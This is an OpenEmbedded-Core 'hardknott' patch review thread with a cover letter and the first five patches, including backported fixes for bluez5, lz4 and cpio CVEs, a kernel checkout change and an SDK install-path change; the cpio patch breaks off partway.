[hardknott][PATCH 00/11] Patch review request

[hardknott][PATCH 00/11] Patch review request

[Anuj Mittal]

Please review these changes for hardknott. Builds cleanly on autobuilder
except for an intermittent failure.

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/2550

Thanks,

Anuj

The following changes since commit e3a7eaf9fe1420b2525e14f0c0f2936e7818b8a3:

  build-appliance-image: Update to hardknott head revision (2021-09-01 16:28:21 +0100)

are available in the Git repository at:

  git://push.openembedded.org/openembedded-core-contrib anujm/hardknott

Andrej Valek (1):
  vim: add option to disable NLS support

Armin Kuster (1):
  lz4: Security Fix for CVE-2021-3520

Bruce Ashfield (3):
  linux-yocto/5.10: update to v5.10.59
  linux-yocto/5.10: update to v5.10.60
  parselogs.py: ignore intermittent CD/DVDROM identification failure

Paul Barker (1):
  kernel-yocto: Simplify no git repo case in do_kernel_checkout

Richard Purdie (3):
  sdk: Decouple default install path from built in path
  oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86
    machines
  xdg-utils: Add fix for CVE-2020-27748

Ross Burton (1):
  cpio: backport fix for CVE-2021-38185

Trevor Gamblin (1):
  bluez5: fix CVE-2021-3658

 meta/classes/kernel-yocto.bbclass             |  30 +-
 meta/classes/populate_sdk_base.bbclass        |   1 +
 meta/conf/bitbake.conf                        |   4 +-
 meta/files/toolchain-shar-extract.sh          |   3 +-
 meta/files/toolchain-shar-relocate.sh         |   2 +-
 meta/lib/oeqa/runtime/cases/parselogs.py      |   1 +
 meta/recipes-connectivity/bluez5/bluez5.inc   |   1 +
 ...ter-Fix-storing-discoverable-setting.patch | 100 +++
 .../cpio/cpio-2.13/CVE-2021-38185.patch       | 581 ++++++++++++++++++
 meta/recipes-extended/cpio/cpio_2.13.bb       |   1 +
 ...9813e0eb0246f63b54e9e154970e609575af.patch |  58 ++
 .../xdg-utils/xdg-utils_1.1.3.bb              |   1 +
 .../linux/linux-yocto-rt_5.10.bb              |   6 +-
 .../linux/linux-yocto-tiny_5.10.bb            |   8 +-
 meta/recipes-kernel/linux/linux-yocto_5.10.bb |  24 +-
 .../lz4/files/CVE-2021-3520.patch             |  27 +
 meta/recipes-support/lz4/lz4_1.9.3.bb         |   1 +
 meta/recipes-support/vim/vim.inc              |   4 +-
 18 files changed, 815 insertions(+), 38 deletions(-)
 create mode 100644 meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch
 create mode 100644 meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
 create mode 100644 meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
 create mode 100644 meta/recipes-support/lz4/files/CVE-2021-3520.patch

-- 
2.31.1

[hardknott][PATCH 01/11] kernel-yocto: Simplify no git repo case in do_kernel_checkout

[Anuj Mittal]

From: Paul Barker <paul@pbarker.dev>

If the kernel sources are not fetched via git, a local git repository is
created in do_kernel_checkout. In this case we know that there will be
no remote branches and we will already be on the correct branch (since
only one branch will exist). So we can simplify things by skipping these
steps.

This also removes the assumption that the default git branch name will
be "master". Prior to this change, the final git checkout command in
do_kernel_checkout could fail if a local git repo was created and the
user had changed init.defaultBranch in their gitconfig.

Signed-off-by: Paul Barker <paul@pbarker.dev>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit af2a9c92d4498492ca23388c7b4bbed48abdc4d7)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 meta/classes/kernel-yocto.bbclass | 30 +++++++++++++++---------------
 1 file changed, 15 insertions(+), 15 deletions(-)

diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index d38b60f519..8878573f6f 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -341,6 +341,21 @@ do_kernel_checkout() {
 			fi
 		fi
 		cd ${S}
+
+		# convert any remote branches to local tracking ones
+		for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
+			b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
+			git show-ref --quiet --verify -- "refs/heads/$b"
+			if [ $? -ne 0 ]; then
+				git branch $b $i > /dev/null
+			fi
+		done
+
+		# Create a working tree copy of the kernel by checking out a branch
+		machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
+
+		# checkout and clobber any unimportant files
+		git checkout -f ${machine_branch}
 	else
 		# case: we have no git repository at all. 
 		# To support low bandwidth options for building the kernel, we'll just 
@@ -362,21 +377,6 @@ do_kernel_checkout() {
 		git commit -q -m "baseline commit: creating repo for ${PN}-${PV}"
 		git clean -d -f
 	fi
-
-	# convert any remote branches to local tracking ones
-	for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
-		b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
-		git show-ref --quiet --verify -- "refs/heads/$b"
-		if [ $? -ne 0 ]; then
-			git branch $b $i > /dev/null
-		fi
-	done
-
-	# Create a working tree copy of the kernel by checking out a branch
-	machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
-
-	# checkout and clobber any unimportant files
-	git checkout -f ${machine_branch}
 }
 do_kernel_checkout[dirs] = "${S} ${WORKDIR}"
 
-- 
2.31.1

[hardknott][PATCH 02/11] bluez5: fix CVE-2021-3658

[Anuj Mittal]

From: Trevor Gamblin <trevor.gamblin@windriver.com>

Backporting upstream fix since the uprev from 5.60 -> 5.61 does include
some minor functionality changes.

Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 meta/recipes-connectivity/bluez5/bluez5.inc   |   1 +
 ...ter-Fix-storing-discoverable-setting.patch | 100 ++++++++++++++++++
 2 files changed, 101 insertions(+)
 create mode 100644 meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch

diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index a7b628ce1b..0d30b1a3f5 100644
--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -52,6 +52,7 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
            ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
            file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
            file://0001-test-gatt-Fix-hung-issue.patch \
+           file://0001-adapter-Fix-storing-discoverable-setting.patch \
            "
 S = "${WORKDIR}/bluez-${PV}"
 
diff --git a/meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch b/meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch
new file mode 100644
index 0000000000..c2a5edd226
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/0001-adapter-Fix-storing-discoverable-setting.patch
@@ -0,0 +1,100 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+discoverable setting shall only be store when changed via Discoverable
+property and not when discovery client set it as that be considered
+temporary just for the lifetime of the discovery.
+
+Upstream-Status: Backport
+(https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b497b5942a8beb8f89ca1c359c54ad67ec843055)
+
+CVE: CVE-2021-3658
+
+Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
+
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ 	if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ 		g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ 					ADAPTER_INTERFACE, "Discoverable");
+-		store_adapter_info(adapter);
++		/* Only persist discoverable setting if it was not set
++		 * temporarily by discovery.
++		 */
++		if (!adapter->discovery_discoverable)
++			store_adapter_info(adapter);
+ 		btd_adv_manager_refresh(adapter->adv_manager);
+ 	}
+ 
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ 	struct mgmt_cp_start_service_discovery *sd_cp;
+-	GSList *l;
+-
+ 
+ 	DBG("");
+ 
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ 		return -ENOMEM;
+ 	}
+ 
+-	for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+-		struct discovery_client *client = l->data;
++	/* Only attempt to overwrite current discoverable setting when not
++	 * discoverable.
++	 */
++	if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++		GSList *l;
+ 
+-		if (!client->discovery_filter)
+-			continue;
++		for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++			struct discovery_client *client = l->data;
+ 
+-		if (client->discovery_filter->discoverable)
+-			break;
+-	}
++			if (!client->discovery_filter)
++				continue;
+ 
+-	set_discovery_discoverable(adapter, l ? true : false);
++			if (client->discovery_filter->discoverable) {
++				set_discovery_discoverable(adapter, true);
++				break;
++			}
++		}
++	}
+ 
+ 	/*
+ 	 * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ 		return 0;
+ 	}
+ 
+-	if (adapter->discovery_discoverable)
+-		set_discovery_discoverable(adapter, false);
++	set_discovery_discoverable(adapter, false);
+ 
+ 	/*
+ 	 * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ 	g_free(adapter->current_discovery_filter);
+ 	adapter->current_discovery_filter = NULL;
+ 
++	set_discovery_discoverable(adapter, false);
+ 	adapter->discovering = false;
+ 
+ 	while (adapter->connections) {
+-- 
+2.33.0
+
-- 
2.31.1

[hardknott][PATCH 03/11] lz4: Security Fix for CVE-2021-3520

[Anuj Mittal]

From: Armin Kuster <akuster@mvista.com>

Source: https://github.com/lz4/lz4
MR: 111604
Type: Security Fix
Disposition: Backport from https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
ChangeID: 58492f950164e75954a97cf084df6f9af3d88244
Description:

Signed-off-by: Armin Kuster <akuster@mvista.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 6d6a089a2f637051333e0137d2e748c823e2aa98)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 .../lz4/files/CVE-2021-3520.patch             | 27 +++++++++++++++++++
 meta/recipes-support/lz4/lz4_1.9.3.bb         |  1 +
 2 files changed, 28 insertions(+)
 create mode 100644 meta/recipes-support/lz4/files/CVE-2021-3520.patch

diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
+From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
+From: Jasper Lievisse Adriaanse <j@jasper.la>
+Date: Fri, 26 Feb 2021 15:21:20 +0100
+Subject: [PATCH] Fix potential memory corruption with negative memmove() size
+
+Upstream-Status: Backport
+https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
+CVE: CVE-2021-3520
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ lib/lz4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/lib/lz4.c
+===================================================================
+--- git.orig/lib/lz4.c
++++ git/lib/lz4.c
+@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
+                  const size_t dictSize         /* note : = 0 if noDict */
+                  )
+ {
+-    if (src == NULL) { return -1; }
++    if ((src == NULL) || (outputSize < 0)) { return -1; }
+ 
+     {   const BYTE* ip = (const BYTE*) src;
+         const BYTE* const iend = ip + srcSize;
diff --git a/meta/recipes-support/lz4/lz4_1.9.3.bb b/meta/recipes-support/lz4/lz4_1.9.3.bb
index effc530b94..9d5dc0253a 100644
--- a/meta/recipes-support/lz4/lz4_1.9.3.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.3.bb
@@ -14,6 +14,7 @@ SRCREV = "d44371841a2f1728a3f36839fd4b7e872d0927d3"
 
 SRC_URI = "git://github.com/lz4/lz4.git;branch=release \
            file://run-ptest \
+           file://CVE-2021-3520.patch \
            "
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
 
-- 
2.31.1

[hardknott][PATCH 04/11] sdk: Decouple default install path from built in path

[Anuj Mittal]

From: Richard Purdie <richard.purdie@linuxfoundation.org>

Add SDKPATHINSTALL which is used as the default install location of the SDK
instead of SDKPATH. This means the default install path isn't encoded into
every SDK binary, meaning if a date is used there the entire SDK doesn't
have to rebuild. Most distros can switch to only customise SDKPATHINSTALL
meaning more sstate reuse too.

[YOCTO #14100]

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit bc4ee5453560dcefc4a4ecc5657df5cc1666e153)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 meta/classes/populate_sdk_base.bbclass | 1 +
 meta/conf/bitbake.conf                 | 4 +++-
 meta/files/toolchain-shar-extract.sh   | 3 ++-
 meta/files/toolchain-shar-relocate.sh  | 2 +-
 4 files changed, 7 insertions(+), 3 deletions(-)

diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index f8072a9d37..2d33611ddd 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -280,6 +280,7 @@ EOF
 	# substitute variables
 	sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
 		-e 's#@SDKPATH@#${SDKPATH}#g' \
+		-e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
 		-e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
 		-e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
 		-e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index 5b52e9307e..d0b92a996a 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -422,8 +422,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
 
 SDK_NAME_PREFIX ?= "oecore"
 SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
-SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
+SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
 SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
+# The path to default to installing the SDK to
+SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
 
 ##################################################################
 # Kernel info.
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index dd9342758b..4386b985bb 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
 	exit 1
 fi
 
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
 SUDO_EXEC=""
 EXTRA_TAR_OPTIONS=""
 target_sdk_dir=""
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index ba873373e2..3ece04db0a 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
              -e "$target_sdk_dir/post-relocate-setup" \
              -e "$target_sdk_dir/${0##*/}" | \
     xargs -n100 $SUDO_EXEC sed -i \
-        -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+        -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
         -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
         -e "s: /usr/bin/perl: /usr/bin/env perl:g"
 
-- 
2.31.1

[hardknott][PATCH 05/11] cpio: backport fix for CVE-2021-38185

[Anuj Mittal]

From: Ross Burton <ross@burtonini.com>

Signed-off-by: Ross Burton <ross.burton@arm.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 4accf77ea5b5810cb2330acc6773690ec1b1c71b)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 .../cpio/cpio-2.13/CVE-2021-38185.patch       | 581 ++++++++++++++++++
 meta/recipes-extended/cpio/cpio_2.13.bb       |   1 +
 2 files changed, 582 insertions(+)
 create mode 100644 meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch

diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
+pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
+an out-of-bounds heap write.
+
+CVE: CVE-2021-38185
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 7 Aug 2021 12:52:21 +0300
+Subject: [PATCH 1/3] Rewrite dynamic string support.
+
+* src/dstring.c (ds_init): Take a single argument.
+(ds_free): New function.
+(ds_resize): Take a single argument.  Use x2nrealloc to expand
+the storage.
+(ds_reset,ds_append,ds_concat,ds_endswith): New function.
+(ds_fgetstr): Rewrite.  In particular, this fixes integer overflow.
+* src/dstring.h (dynamic_string): Keep both the allocated length
+(ds_size) and index of the next free byte in the string (ds_idx).
+(ds_init,ds_resize): Change signature.
+(ds_len): New macro.
+(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
+* src/copyin.c: Use new ds_ functions.
+* src/copyout.c: Likewise.
+* src/copypass.c: Likewise.
+* src/util.c: Likewise.
+---
+ src/copyin.c   | 40 +++++++++++------------
+ src/copyout.c  | 16 ++++-----
+ src/copypass.c | 34 +++++++++----------
+ src/dstring.c  | 88 ++++++++++++++++++++++++++++++++++++--------------
+ src/dstring.h  | 31 +++++++++---------
+ src/util.c     |  6 ++--
+ 6 files changed, 123 insertions(+), 92 deletions(-)
+
+diff --git a/src/copyin.c b/src/copyin.c
+index b29f348..37e503a 100644
+--- a/src/copyin.c
++++ b/src/copyin.c
+@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
+   char *str_res;		/* Result for string function.  */
+   static dynamic_string new_name;	/* New file name for rename option.  */
+   static int initialized_new_name = false;
++
+   if (!initialized_new_name)
+-  {
+-    ds_init (&new_name, 128);
+-    initialized_new_name = true;
+-  }
++    {
++      ds_init (&new_name);
++      initialized_new_name = true;
++    }
+ 
+   if (rename_flag)
+     {
+@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
+    already in `save_patterns' (from the command line) are preserved.  */
+ 
+ static void
+-read_pattern_file ()
++read_pattern_file (void)
+ {
+-  int max_new_patterns;
+-  char **new_save_patterns;
+-  int new_num_patterns;
++  char **new_save_patterns = NULL;
++  size_t max_new_patterns;
++  size_t new_num_patterns;
+   int i;
+-  dynamic_string pattern_name;
++  dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
+   FILE *pattern_fp;
+ 
+   if (num_patterns < 0)
+     num_patterns = 0;
+-  max_new_patterns = 1 + num_patterns;
+-  new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
+   new_num_patterns = num_patterns;
+-  ds_init (&pattern_name, 128);
++  max_new_patterns = num_patterns;
++  new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
+ 
+   pattern_fp = fopen (pattern_file_name, "r");
+   if (pattern_fp == NULL)
+     open_fatal (pattern_file_name);
+   while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
+     {
+-      if (new_num_patterns >= max_new_patterns)
+-	{
+-	  max_new_patterns += 1;
+-	  new_save_patterns = (char **)
+-	    xrealloc ((char *) new_save_patterns,
+-		      max_new_patterns * sizeof (char *));
+-	}
++      if (new_num_patterns == max_new_patterns)
++	new_save_patterns = x2nrealloc (new_save_patterns,
++					&max_new_patterns,
++					sizeof (new_save_patterns[0]));
+       new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
+       ++new_num_patterns;
+     }
++
++  ds_free (&pattern_name);
++  
+   if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
+     close_error (pattern_file_name);
+ 
+@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
+    in the file system.  */
+ 
+ void
+-process_copy_in ()
++process_copy_in (void)
+ {
+   char done = false;		/* True if trailer reached.  */
+   FILE *tty_in = NULL;		/* Interactive file for rename option.  */
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..26e3dda 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
+    The format of the header depends on the compatibility (-c) flag.  */
+ 
+ void
+-process_copy_out ()
++process_copy_out (void)
+ {
+-  dynamic_string input_name;	/* Name of file read from stdin.  */
++  dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++                                /* Name of file read from stdin.  */
+   struct stat file_stat;	/* Stat record for file.  */
+   struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
+                                 /* Output header information.  */
+@@ -605,7 +606,6 @@ process_copy_out ()
+   char *orig_file_name = NULL;
+ 
+   /* Initialize the copy out.  */
+-  ds_init (&input_name, 128);
+   file_hdr.c_magic = 070707;
+ 
+   /* Check whether the output file might be a tape.  */
+@@ -657,14 +657,9 @@ process_copy_out ()
+ 	    {
+ 	      if (file_hdr.c_mode & CP_IFDIR)
+ 		{
+-		  int len = strlen (input_name.ds_string);
+ 		  /* Make sure the name ends with a slash */
+-		  if (input_name.ds_string[len-1] != '/')
+-		    {
+-		      ds_resize (&input_name, len + 2);
+-		      input_name.ds_string[len] = '/';
+-		      input_name.ds_string[len+1] = 0;
+-		    }
++		  if (!ds_endswith (&input_name, '/'))
++		    ds_append (&input_name, '/');
+ 		}
+ 	    }
+ 	  
+@@ -875,6 +870,7 @@ process_copy_out ()
+ 			 (unsigned long) blocks), (unsigned long) blocks);
+     }
+   cpio_file_stat_free (&file_hdr);
++  ds_free (&input_name);
+ }
+ 
+ 
+diff --git a/src/copypass.c b/src/copypass.c
+index dc13b5b..62f31c6 100644
+--- a/src/copypass.c
++++ b/src/copypass.c
+@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
+    If `link_flag', link instead of copying.  */
+ 
+ void
+-process_copy_pass ()
++process_copy_pass (void)
+ {
+-  dynamic_string input_name;	/* Name of file from stdin.  */
+-  dynamic_string output_name;	/* Name of new file.  */
++  dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++                                /* Name of file from stdin.  */
++  dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
++                                /* Name of new file.  */
+   size_t dirname_len;		/* Length of `directory_name'.  */
+   int res;			/* Result of functions.  */
+   char *slash;			/* For moving past slashes in input name.  */
+@@ -65,25 +67,18 @@ process_copy_pass ()
+ 				   created files  */
+ 
+   /* Initialize the copy pass.  */
+-  ds_init (&input_name, 128);
+   
+   dirname_len = strlen (directory_name);
+   if (change_directory_option && !ISSLASH (directory_name[0]))
+     {
+       char *pwd = xgetcwd ();
+-
+-      dirname_len += strlen (pwd) + 1;
+-      ds_init (&output_name, dirname_len + 2);
+-      strcpy (output_name.ds_string, pwd);
+-      strcat (output_name.ds_string, "/");
+-      strcat (output_name.ds_string, directory_name);
++      
++      ds_concat (&output_name, pwd);
++      ds_append (&output_name, '/');
+     }
+-  else
+-    {
+-      ds_init (&output_name, dirname_len + 2);
+-      strcpy (output_name.ds_string, directory_name);
+-    }
+-  output_name.ds_string[dirname_len] = '/';
++  ds_concat (&output_name, directory_name);
++  ds_append (&output_name, '/');
++  dirname_len = ds_len (&output_name);
+   output_is_seekable = true;
+ 
+   change_dir ();
+@@ -116,8 +111,8 @@ process_copy_pass ()
+       /* Make the name of the new file.  */
+       for (slash = input_name.ds_string; *slash == '/'; ++slash)
+ 	;
+-      ds_resize (&output_name, dirname_len + strlen (slash) + 2);
+-      strcpy (output_name.ds_string + dirname_len + 1, slash);
++      ds_reset (&output_name, dirname_len);
++      ds_concat (&output_name, slash);
+ 
+       existing_dir = false;
+       if (lstat (output_name.ds_string, &out_file_stat) == 0)
+@@ -333,6 +328,9 @@ process_copy_pass ()
+ 			 (unsigned long) blocks),
+ 	       (unsigned long) blocks);
+     }
++
++  ds_free (&input_name);
++  ds_free (&output_name);
+ }
+ \f
+ /* Try and create a hard link from FILE_NAME to another file 
+diff --git a/src/dstring.c b/src/dstring.c
+index e9c063f..358f356 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -20,8 +20,8 @@
+ #if defined(HAVE_CONFIG_H)
+ # include <config.h>
+ #endif
+-
+ #include <stdio.h>
++#include <stdlib.h>
+ #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
+ #include <string.h>
+ #else
+@@ -33,24 +33,41 @@
+ /* Initialiaze dynamic string STRING with space for SIZE characters.  */
+ 
+ void
+-ds_init (dynamic_string *string, int size)
++ds_init (dynamic_string *string)
++{
++  memset (string, 0, sizeof *string);
++}
++
++/* Free the dynamic string storage. */
++
++void
++ds_free (dynamic_string *string)
+ {
+-  string->ds_length = size;
+-  string->ds_string = (char *) xmalloc (size);
++  free (string->ds_string);
+ }
+ 
+-/* Expand dynamic string STRING, if necessary, to hold SIZE characters.  */
++/* Expand dynamic string STRING, if necessary.  */
+ 
+ void
+-ds_resize (dynamic_string *string, int size)
++ds_resize (dynamic_string *string)
+ {
+-  if (size > string->ds_length)
++  if (string->ds_idx == string->ds_size)
+     {
+-      string->ds_length = size;
+-      string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
++      string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
++				      1);
+     }
+ }
+ 
++/* Reset the index of the dynamic string S to LEN. */
++
++void
++ds_reset (dynamic_string *s, size_t len)
++{
++  while (len > s->ds_size)
++    ds_resize (s);
++  s->ds_idx = len;
++}
++
+ /* Dynamic string S gets a string terminated by the EOS character
+    (which is removed) from file F.  S will increase
+    in size during the function if the string from F is longer than
+@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
+ char *
+ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ {
+-  int insize;			/* Amount needed for line.  */
+-  int strsize;			/* Amount allocated for S.  */
+   int next_ch;
+ 
+   /* Initialize.  */
+-  insize = 0;
+-  strsize = s->ds_length;
++  s->ds_idx = 0;
+ 
+   /* Read the input string.  */
+-  next_ch = getc (f);
+-  while (next_ch != eos && next_ch != EOF)
++  while ((next_ch = getc (f)) != eos && next_ch != EOF)
+     {
+-      if (insize >= strsize - 1)
+-	{
+-	  ds_resize (s, strsize * 2 + 2);
+-	  strsize = s->ds_length;
+-	}
+-      s->ds_string[insize++] = next_ch;
+-      next_ch = getc (f);
++      ds_resize (s);
++      s->ds_string[s->ds_idx++] = next_ch;
+     }
+-  s->ds_string[insize++] = '\0';
++  ds_resize (s);
++  s->ds_string[s->ds_idx] = '\0';
+ 
+-  if (insize == 1 && next_ch == EOF)
++  if (s->ds_idx == 0 && next_ch == EOF)
+     return NULL;
+   else
+     return s->ds_string;
+ }
+ 
++void
++ds_append (dynamic_string *s, int c)
++{
++  ds_resize (s);
++  s->ds_string[s->ds_idx] = c;
++  if (c)
++    {
++      s->ds_idx++;
++      ds_resize (s);
++      s->ds_string[s->ds_idx] = 0;
++    }      
++}
++
++void
++ds_concat (dynamic_string *s, char const *str)
++{
++  size_t len = strlen (str);
++  while (len + 1 > s->ds_size)
++    ds_resize (s);
++  memcpy (s->ds_string + s->ds_idx, str, len);
++  s->ds_idx += len;
++  s->ds_string[s->ds_idx] = 0;
++}
++
+ char *
+ ds_fgets (FILE *f, dynamic_string *s)
+ {
+@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
+ {
+   return ds_fgetstr (f, s, '\0');
+ }
++
++/* Return true if the dynamic string S ends with character C. */
++int
++ds_endswith (dynamic_string *s, int c)
++{
++  return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
++}
